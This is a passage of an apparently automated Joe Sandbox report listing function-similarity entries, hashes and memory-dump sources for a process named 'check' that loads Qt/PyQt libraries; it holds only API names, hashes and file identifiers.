                                                                                                                                                                                                                • String ID: QAbstractState$senderSignalIndex$senderSignalIndex(self) -> int
                                                                                                                                                                                                                • API String ID: 2462028585-1887021121
                                                                                                                                                                                                                • Opcode ID: a67cf712af00afc5834cdc2a62f0b3be842776456ebf4dc2c94a617d65d61252
                                                                                                                                                                                                                • Instruction ID: 3aacf7df16b6cfc648d1bb20116f5d5366309b909e757ee856ef76aa1b3ab621
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a67cf712af00afc5834cdc2a62f0b3be842776456ebf4dc2c94a617d65d61252
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E0116B6A09A46C1DB409F71E84CBA933A4FB44B80F9A0032CA5D53320EF7DD54AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?hasBool_CborFromLongNext@Reader@@Stream
                                                                                                                                                                                                                • String ID: QCborStreamReader$hasNext$hasNext(self) -> bool
                                                                                                                                                                                                                • API String ID: 1562547744-3967900781
                                                                                                                                                                                                                • Opcode ID: 6a26ec3de3e9c2bf3e772d9d23f366cce6f1a72f0c2407767621c47e595e57cb
                                                                                                                                                                                                                • Instruction ID: 7bef849c8f4748d419c014c967cff056d7194d44715306e3b362ab10f374ff4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a26ec3de3e9c2bf3e772d9d23f366cce6f1a72f0c2407767621c47e595e57cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2012CB5A05E8691DB40EF71E85CBA833A4FB44B44F994032CA5D53320EF7DD54AC384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?enumeratorFromLongLong_MetaObject@@Offset@
                                                                                                                                                                                                                • String ID: QMetaObject$enumeratorOffset$enumeratorOffset(self) -> int
                                                                                                                                                                                                                • API String ID: 2403592489-2286993898
                                                                                                                                                                                                                • Opcode ID: ed867f118bdd7fd0cbf08e9686c4aeeb2ead2a6524afde78b4474ec0903c5d03
                                                                                                                                                                                                                • Instruction ID: ec3299cef05532023d856aeeb54ddbbc650546057822e55ef1e225c991d481c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed867f118bdd7fd0cbf08e9686c4aeeb2ead2a6524afde78b4474ec0903c5d03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 690116B5A09A4681DB409F75E84CBA933A4FB44B94F994032CA8D53320EF7DDA5AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?hasBool_Data@@FromLongMimeUrls@
                                                                                                                                                                                                                • String ID: QMimeData$hasUrls$hasUrls(self) -> bool
                                                                                                                                                                                                                • API String ID: 3637462522-4093972381
                                                                                                                                                                                                                • Opcode ID: 7907e76efa5fb15b4ff510fbe2abe77fd10a12b8cbba10623c4b061eb0fb4e21
                                                                                                                                                                                                                • Instruction ID: ec52519a3cd7d3d82e26370be4671f3413ebf283426da0d0ef3ad5019576dd5f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7907e76efa5fb15b4ff510fbe2abe77fd10a12b8cbba10623c4b061eb0fb4e21
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49011AB1A05A46C1DB00DF61E84CBA833A4FB44B84F954032CA5D13320DF7DD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Long$?size@FileFromInfo@@Long_
                                                                                                                                                                                                                • String ID: QFileInfo$size$size(self) -> int
                                                                                                                                                                                                                • API String ID: 2915293609-3046504676
                                                                                                                                                                                                                • Opcode ID: 5bacfae23c0f23a3f040cbdd746c4f9ddb31b1cd9f3a37a28e4a08f0986d585a
                                                                                                                                                                                                                • Instruction ID: 569c4c79826969471f571be19669caaa9dde3d3fce6b63c4b837d4172b64812e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bacfae23c0f23a3f040cbdd746c4f9ddb31b1cd9f3a37a28e4a08f0986d585a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF012CB5A09A46C1DB00DF61E88CBA937A4FB84B80F954032C94E13720EFBDD549C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Declaration@@List_NotationStream$DeallocItemV0@@malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3180538310-0
                                                                                                                                                                                                                • Opcode ID: 3b8638a6f45ea1571d96744fd2069f323a0767c529f0abae286d4b9ac7331542
                                                                                                                                                                                                                • Instruction ID: ea083cd52bf5ce771fa2d418f6aba97a0730b1f88afc4d3d87f6c5a0fb8af1f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b8638a6f45ea1571d96744fd2069f323a0767c529f0abae286d4b9ac7331542
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B21A4E2B09B4189EE549F62E88467D67A0BF88FC4F088035DE4E17755EEBCD0858304
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction ID: 5ff1a9f5cd88b48586d0c0b0d969a68c1666c375950eae13d835ef2c7000b609
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0114622D5CA0309FA541175E5A537B1150AF9E3FCE34C6B4EA6FD62FA8F6C6A454100
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3AF
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3CE
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3F6
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B407
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B418
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                • Instruction ID: 1d0f6b056385930b42361bfe3dcdfb95654cc8aa94b0a83347f9367ec35ce8c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2115421F0D64281F994A725565117A52429F4CFB8F78C3B4E97FC66F6FE2CE5424304
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$V0@$$V0@@malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 908121504-0
                                                                                                                                                                                                                • Opcode ID: e351c9c18f02f2d90909b8fbd4a1be88d569826d2af6c327d7088b289c367f3b
                                                                                                                                                                                                                • Instruction ID: f9b739c67248497ce3489ced4e4c37934f2a59ab4e8d7ef9e52e83ade0bcf574
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e351c9c18f02f2d90909b8fbd4a1be88d569826d2af6c327d7088b289c367f3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D611A5A5A0D901C6EB509F34E858B3E63B0FB99B84F584130DA4D57798EF3CE885C748
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SubtypeType_
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2891779845-2407233842
                                                                                                                                                                                                                • Opcode ID: cde3a305d3058d89e665ecd80069729574b0aade23d5debb8be0c0564d1ea4f2
                                                                                                                                                                                                                • Instruction ID: e589dcbcf9ed23b7cc1fa6c32d3fd25aa1eeb2660d36c608a6b9d493945983b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde3a305d3058d89e665ecd80069729574b0aade23d5debb8be0c0564d1ea4f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 805132B6A09B4686EB40DF26E444669B3B4FB88BD4F088032DE4D53769DF7CE495C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ??0QRegExp@@QEAA@XZ.QT5CORE ref: 00007FFB02F7E2F5
                                                                                                                                                                                                                • ??0QRegExp@@QEAA@AEBVQString@@W4CaseSensitivity@Qt@@W4PatternSyntax@0@@Z.QT5CORE ref: 00007FFB02F7E3B7
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
